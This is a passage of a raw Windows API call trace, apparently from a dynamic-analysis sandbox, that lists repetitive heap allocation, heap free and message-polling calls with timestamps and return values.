(HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.492] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.492] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.492] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.492] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.493] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.493] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.494] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.494] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.494] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.495] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.495] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.495] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.496] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.496] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.496] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.496] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.496] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.497] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.497] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.497] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.497] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.498] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.498] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.498] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: 